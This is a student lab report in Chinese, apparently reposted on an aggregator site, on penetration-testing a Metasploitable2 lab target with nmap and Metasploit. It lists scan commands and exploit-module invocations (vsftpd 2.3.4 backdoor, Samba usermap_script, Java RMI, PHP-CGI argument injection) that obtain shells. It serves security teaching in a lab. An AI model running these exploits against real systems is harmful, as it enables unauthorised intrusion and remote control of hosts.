20232417 2025-2026-1 《网络与系统攻防技术》实验六实验报告

news/2025/11/22 20:09:35/文章来源:https://www.cnblogs.com/hyjpdj0311/p/19233117

1.实验内容

1.1实验要求

本实践目标是掌握metasploit的用法,通过实战演练理解常见漏洞的利用原理和渗透测试流程。

1.2学习内容

2.实验过程

2.1前期渗透

2.1.1主机发现

在靶机中输入ipconfig得到靶机的IP地址。其IP地址为192.168.3.48。
image
在Kali虚拟机输入msfconsole,随后输入以下命令:

search arp_sweep #在Metasploit中搜索与ARP扫描相关的模块
use 0 #选择搜索结果显示的第一个模块
set RHOSTS 192.168.3.0/24 #设置目标网络范围为192.168.3.0/24
run

image
扫描结果发现IP为192.168.3.48的靶机是活跃主机,并且识别为VMware虚拟机。

2.1.2端口扫描

在kaili虚拟机输入nmap -sS -sV 192.168.3.48的命令进行nmap扫描。SYN扫描发现靶机开放了大量端口并且还有多个漏洞。
image
我们还可以使用Metasploit框架进行TCP端口扫描,命令如下:

use auxiliary/scanner/portscan/tcp #加载TCP端口扫描模块
set RHOSTS 192.168.3.48
set THREADS 10 #设置并发线程数
run

image

2.1.3漏洞扫描

在Kali虚拟机输入nmap -script=vuln 192.168.3.48命令进行漏洞扫描。这个命令可以批量扫描多种漏洞并且还会标识漏洞类型。
(1)21端口:发现vsFTPd 2.3.4存在可被直接利用的后门漏洞,攻击者已通过验证获得root权限,系统已被完全控制
image
(2)25端口:SMTP服务存在多个SSL/TLS加密漏洞,可能被中间人攻击导致邮件通信被窃听或篡改。
image
(3)80端口:HTTP服务存在Slowloris拒绝服务漏洞和多个SQL注入点,攻击者可导致服务瘫痪或窃取数据库信息。
image
(4)1099端口:Java RMI服务远程代码执行漏洞,攻击者可通过恶意类加载在目标系统上执行任意代码,危害等级极高。
image
(5)5432端口:PostgreSQL服务的加密传输层存在严重缺陷,威胁所有通过SSL连接的数据通信安全。
image

2.2Vsftpd源码包后门漏洞(21端口)

在Kali虚拟机输入nmap -sV -p 21 192.168.3.48命令,针对靶机的21端口进行服务版本探测。这个结果证实了之前漏洞扫描的准确性:确认存在vsftpd 2.3.4服务,验证了该版本确实存在后门漏洞
image
在Metasploit框架输入如下命令,利用这个漏洞:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.3.48
run

image
运行成功之后可以获取靶机的shell,输入ls可以显示当前目录下的文件,即输出相关指令可以得到相应的输出。

2.3SambaMS-RPC Shell命令注入漏洞(端口139)

在Kali虚拟机输入nmap -p 139 192.168.3.48命令扫描139端口,发现该端口是开放的。
image
在Metasploit框架中输入以下命令,利用Samba服务的usermap_script漏洞。利用该漏洞同样可以获取靶机的shell。

use exploit/multi/samba/usermap_script
set RHOST 192.168.3.48
run

image

2.4Java RMI SERVER命令执行漏洞(1099端口)

先在虚拟机输入nmap -p 1099 192.168.3.48命令查看1099端口是否开放,从结果截图可以看到该端口是开放的。
image
在Kali虚拟机的Metasploit框架下输入以下命令就可以利用Java RMI服务的远程代码执行漏洞获取靶机的shell。

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.3.48
run

image

2.5PHP CGI参数执行注入漏洞(80端口)

在虚拟机输入nmap -p 80 192.168.3.48命令扫描80端口,可以看到该端口是开放的。
image
在Kali虚拟机的Metasploit框架下输入以下命令就可以利用PHP-CGI的参数注入漏洞。

use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.3.48
run

image
与之前不同的是使用whoami指令查看的用户是www-data。我想这可能是因为PHP-CGI漏洞获得的是Web服务权限(www-data),而其他漏洞后门可以直接获得系统最高权限(root),这取决于攻击的服务层级和运行权限不同。

3.问题及解决方案

  • 问题:在获取靶机IP的时候发现其与Kali虚拟机IP不在同一个网段下
  • 解决方案:根据以前配置虚拟机的经验,将靶机的网络适配器该为桥连模式就好了。

4.学习感悟、思考等

参考资料

靶机Metasploitable2的安装
毕悠尘同学的博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/973379.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Trick——字符串

Part1 问题:两个等长字符串的不同后缀与另两个字符串的不同后缀分别匹配。 问题有些抽象,举个例子: aaaaaaabbbc aaaaaaddcdbsdscabbbc sdscddcdb这样的两组字符串就存在匹配。 可以用字符串\(hash\)解决。 设字符串…

2022年春季研究资助计划征集技术提案

某中心研究奖项计划发布2022年春季提案征集,涵盖AI信息安全、公平AI、广告技术、社区机器学习等五大技术领域,提供资金和云计算资源支持学术研究。某中心研究奖项发布2022年春季提案征集 某中心研究奖项(ARA)宣布启…

BLOG-1-电梯调度算法

一、前言 对三次题目总结: 三次题目难度逐渐递增。题目数量适当,规定时间内足已完成。每一次题目集前面小题像是练手最后一题难度飙升是真正考验学习成果的时候。第一次题目集让人眼前一亮以前从没做过类似的题目,光…

线圈公司质量排名,线圈生产厂家性价比推荐,变压器公司行业排名,变压器生产厂家客户推荐。滤波器公司技术排名,开关变压器公司性价比榜单

线圈公司质量排名,线圈生产厂家性价比推荐,变压器公司行业排名,变压器生产厂家客户推荐。滤波器公司技术排名,开关变压器公司性价比榜单线圈公司质量排名,线圈生产厂家性价比推荐,变压器公司行业排名,变压器生产…

IDA之修复结构体

修复结构体有两种方法 一是C语言式修复(麻烦) 二是直接设置(更简单,更推荐) 首先学会设置IDB快照(其实本人很少使用) IDB快照:.idb文件,可快速帮我们恢复某个时间点的快照,可以防止错误太多View - Database sn…

2025年专业集成房屋安装公司排名,集成活动房十大靠谱厂家推荐榜,石家庄集成房屋公司十大排行:义广达彩钢口碑推荐榜,河北集成活动房厂家十大推荐榜

2025年专业集成房屋安装公司排名,集成活动房十大靠谱厂家推荐榜,石家庄集成房屋公司十大排行:义广达彩钢口碑推荐榜,河北集成活动房厂家十大推荐榜2025年专业集成房屋安装公司排名,集成活动房十大靠谱厂家推荐榜,…

真的好怪题解:P14314 [Aboi Round 2] Oneshot

来一篇真的好怪的题解。 正文 首先有一个很低级的做法,就是每次询问直接拉出来 \(\frac np\) 个数,然后排好序,用另外 \(\frac nq\) 个数在那上面二分就结束了。 这样做的复杂度是 \(\mathcal{O}(nm\log n)\)。 然后…

ElasticSearch索引库操作 - 努力-

ElasticSearch索引库操作一、ElasticSearch基础概念 1.1 文档和字段:ElasticSearch是面向文档(Document)存储的,可以是数据库中的一条商品数据,一个订单信息。文档数据会被序列化为json格式后存储在ElasticSearch…

2025年集成房屋设计公司十大排名,岗亭加工厂家十大排行榜,专业岗亭定制工厂怎么选?彩钢移动厕所厂家推荐。

2025年集成房屋设计公司十大排名,岗亭加工厂家十大排行榜,专业岗亭定制工厂怎么选?彩钢移动厕所厂家推荐。2025年集成房屋设计公司十大排名,岗亭加工厂家十大排行榜,专业岗亭定制工厂怎么选?彩钢移动厕所厂家推荐…

洛谷 P5658 [CSP-S 2019] 括号树 题解

题目大意 给定一棵树,每个节点有一个括号。对于每个节点 \(i\),定义 \(s_i\) 为从根节点到 \(i\) 的路径上所有括号按顺序组成的字符串。求每个 \(s_i\) 中互不相同的合法括号子串的个数 \(k_i\)。 思路 首先,\(k_i…

礼盒拖车公司推荐,礼盒拖车定制公司排行榜,礼盒拖车厂家口碑推荐,礼盒拖车生产厂家-航利通达

礼盒拖车公司推荐,礼盒拖车定制公司排行榜,礼盒拖车厂家口碑推荐,礼盒拖车生产厂家-航利通达礼盒拖车公司推荐,礼盒拖车定制公司排行榜,礼盒拖车厂家口碑推荐,礼盒拖车生产厂家-航利通达在当下这个视觉至上的时代…

360笔试

看到 PC 客户端对 ACMer 有加分项,就投了下这个。 \(2\) 个小时,前面有 \(40\) 道选择题,涉及内容包含数学、数据结构、操作系统、网络安全,还有一些关于 C++ 的类什么的和一些简单算法的原理什么的,不过前面那些…

图像的颜色模式

图像的颜色模式0.1 灰度模式 也就是灰度图(黑白照片),每个像素只有明暗变化,用0~255共256个亮度级来表示,用8个bit来表示,所以每个像素信息用8bit储存. 0.2 位图模式(二值图像) 即只有纯黑和纯白两种亮度,没有渐变…

.NET+AI | MEAI | Function Caling 实操(4)

.NET+AI | MEAI | Function Caling 实操 TL;DR✅ 注册你的方法为工具(Tool) ✅ 启用中间件 UseFunctionInvocation() ✅ 设置 ChatOptions.ToolMode = Auto ✅ 发起对话,MEAI 自动完成:请求 → 调用 → 回填 → 作…

高频变压器公司口碑榜单,电感公司技术排名,电感厂家交付效率排名,磁性元器件公司客户推荐,电感器公司产能排名,线圈公司行业排名-汉翔电子

高频变压器公司口碑榜单,电感公司技术排名,电感厂家交付效率排名,磁性元器件公司客户推荐,电感器公司产能排名,线圈公司行业排名-汉翔电子高频变压器公司口碑榜单,电感公司技术排名,电感厂家交付效率排名,磁性…

noip13

11.2211.22 颓死了,不想改。 t1 场切。 观察大样例大胆猜测答案很小(实际上答案不超过6,伏笔)。 然后手模inf组数据即可发现结论。 将每个数在这几步中每次选几个看成 \(x\) 进制数 (\(x=a_{i+1}/a_i\)) ,而 \(x^…

高频变压器厂家,电感生产厂家,磁性元器件源头厂家推荐,滤波器生产厂家有哪些,高频变压器公司排行榜,高频变压器公司交付效率排名,高频变压器公司小型化解决方案

高频变压器厂家,电感生产厂家,磁性元器件源头厂家推荐,滤波器生产厂家有哪些,高频变压器公司排行榜,高频变压器公司交付效率排名,高频变压器公司小型化解决方案高频变压器厂家,电感生产厂家,磁性元器件源头厂家…

Java中HashMap的核心原理与使用注意事项

大家好,我是一名正在实习的Java开发。最近在参与项目迭代时,遇到了一个很棘手的问题:线上环境有个接口偶尔会出现响应超时,排查了半天才发现,原来是并发场景下误用了HashMap导致的哈希冲突恶化,查询性能直接从O(…

MinIo介绍 - 努力-

MinIo介绍MinIo介绍,文件存储一、 MinIO介绍MinIO作为文件存储的软件,这是一个基于Go编写的开源对象存储套件,虽然轻量,却拥有着不错的性能。  MinIO非常适合于存储大容量非结构化的数据,例如图片、视频、日志文…

BLOG1

一、前言 知识点覆盖:三次作业逐步引入了类的封装与继承、集合框架(ArrayList、HashSet、Deque等)的应用、单一职责原则(SRP)的实践、请求队列的管理、调度算法的优化,以及输入输出的高效处理。此外,还涉及边界…